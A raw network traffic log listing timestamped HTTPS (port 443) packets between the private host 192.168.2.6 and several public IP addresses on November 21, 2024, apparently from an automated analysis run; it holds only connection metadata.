Nov 21, 2024 09:53:31.551726103 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:31.551805973 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:31.655606985 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.655606985 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.655658960 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.655673981 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.691694975 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.691759109 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.691833019 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.692070007 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.692117929 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.692121029 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.692137957 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.692189932 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.692481995 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.692503929 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:32.542192936 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.542217016 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.542576075 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.542747974 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.545860052 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.545883894 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.546514034 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.546556950 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.546715021 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.546725988 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.547029972 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.547094107 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.953980923 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.954020977 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.954080105 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.954097033 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.954109907 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.954144001 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.958219051 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.958275080 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:32.958292007 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:32.958317041 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.196644068 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:33.196693897 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:33.196722984 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.196738958 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:33.196758032 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:33.196784019 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.196784019 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.196810961 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.352562904 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.352582932 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:33.355149031 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:33.355191946 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:33.489557028 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:33.499128103 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:33.541573048 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:33.541610956 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.456346035 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.456388950 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:34.464202881 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.464211941 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:34.464262009 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.464303017 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:34.746534109 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.746561050 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:34.747709036 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.747709036 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:34.747715950 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:34.747730970 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.117893934 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.117950916 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.117971897 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.118019104 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.118035078 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.118038893 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.118074894 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.118093967 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.118093967 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.118093967 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.118232012 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.118287086 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.408843040 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.408905983 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.408929110 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.408963919 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.409024000 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.409024000 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.409041882 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.415452003 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.415533066 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.576189041 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.576220036 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.576239109 CET	49713	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.576246023 CET	443	49713	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.576759100 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.576759100 CET	49714	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:35.576790094 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.576802015 CET	443	49714	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:35.938705921 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:35.938832998 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:35.938911915 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:35.939739943 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:35.939779997 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:37.826055050 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:37.826162100 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:37.829267979 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:37.829284906 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:37.829653025 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:37.831365108 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:37.831434011 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:37.831440926 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:37.831609964 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:37.875354052 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:38.240744114 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:38.240938902 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:38.241007090 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:38.241056919 CET	49715	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:38.241077900 CET	443	49715	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:38.597258091 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:38.597357988 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:38.597433090 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:38.597712040 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:38.597744942 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:38.912488937 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:38.912532091 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:38.912600040 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:38.913042068 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:38.913124084 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:38.913188934 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:38.913340092 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:38.913356066 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:38.913604021 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:38.913626909 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:39.705600977 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:39.705697060 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:39.705981970 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:39.706864119 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:39.706902027 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:40.285417080 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.285727024 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.285753012 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.287220001 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.287286997 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.288539886 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.288635015 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.288773060 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.322725058 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.323401928 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.323462009 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.324393988 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.324475050 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.326014042 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.326107025 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.335335970 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.339243889 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.339256048 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.369870901 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.369899988 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.386384964 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.402378082 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.402456045 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:40.406388998 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:40.406404972 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.406766891 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.417166948 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.418740988 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:40.463341951 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.684919119 CET	49673	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:40.684928894 CET	49674	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:40.806433916 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.806498051 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.806519032 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.806555986 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.806587934 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.806632042 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.806646109 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.806646109 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.851547956 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.869210958 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.869236946 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.869298935 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.869312048 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.869345903 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.869374037 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.883567095 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.883626938 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.883668900 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.883739948 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:40.883739948 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:40.883778095 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:40.883879900 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:40.994405985 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.994429111 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:40.994491100 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:40.994671106 CET	49672	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:41.002428055 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:41.002480984 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:41.002494097 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:41.002588034 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:41.002634048 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:41.039861917 CET	49723	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:53:41.039880037 CET	443	49723	185.221.216.102	192.168.2.6
Nov 21, 2024 09:53:41.074024916 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.074084044 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.074107885 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.074150085 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.074167013 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.074199915 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.117337942 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.117407084 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.117448092 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.117479086 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.117495060 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.117517948 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.169256926 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:41.169321060 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:41.169384003 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:41.169825077 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:41.169846058 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:41.255805016 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.255836010 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.256010056 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.256011009 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.256056070 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.256109953 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.291228056 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.291260958 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.291410923 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.291410923 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.291465044 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.291512012 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.312735081 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.312807083 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.312920094 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.312920094 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.312979937 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.313034058 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.443545103 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.443614960 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.443634987 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.443674088 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.443691015 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.443717957 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.459300041 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.459358931 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.459378004 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.459392071 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.459449053 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.464554071 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.464637041 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.468242884 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.468272924 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.468662024 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.470356941 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.470432043 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.470447063 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.470525026 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.473802090 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.473850965 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.473876953 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.473896027 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.473927975 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.473947048 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.490571976 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.490597010 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.490633965 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.490652084 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.490691900 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.490691900 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.507235050 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.507257938 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.507302046 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.507329941 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.507352114 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.507374048 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.515353918 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.522766113 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.522788048 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.522835970 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.522847891 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.522891045 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.522931099 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.605407953 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:41.605472088 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:41.605644941 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:41.607393980 CET	49731	443	192.168.2.6	184.28.90.27
Nov 21, 2024 09:53:41.607414007 CET	443	49731	184.28.90.27	192.168.2.6
Nov 21, 2024 09:53:41.651231050 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.651256084 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.651302099 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.651333094 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.651350975 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.651365995 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.656867981 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.656925917 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.656936884 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.656969070 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.656989098 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.656989098 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.657013893 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.657028913 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.657028913 CET	49721	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.657037973 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.657046080 CET	443	49721	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.710354090 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.710372925 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.710408926 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.710417986 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.710484982 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.710485935 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.716368914 CET	49733	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.716379881 CET	443	49733	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.716408014 CET	49732	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.716430902 CET	443	49732	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.718575954 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.718590021 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.718642950 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.718837023 CET	49734	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.718852997 CET	443	49734	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.718960047 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.718971968 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.719098091 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.719763994 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.719810009 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.719912052 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.720046997 CET	49736	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.720062017 CET	443	49736	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.720175982 CET	49735	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:41.720184088 CET	443	49735	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:41.860610008 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.860817909 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.861238003 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.861701965 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:41.861740112 CET	443	49726	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:41.861793041 CET	49726	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:42.616488934 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:42.665980101 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:42.686194897 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:42.686238050 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:42.690179110 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:42.690264940 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:42.691390991 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:42.691598892 CET	443	49728	142.250.185.132	192.168.2.6
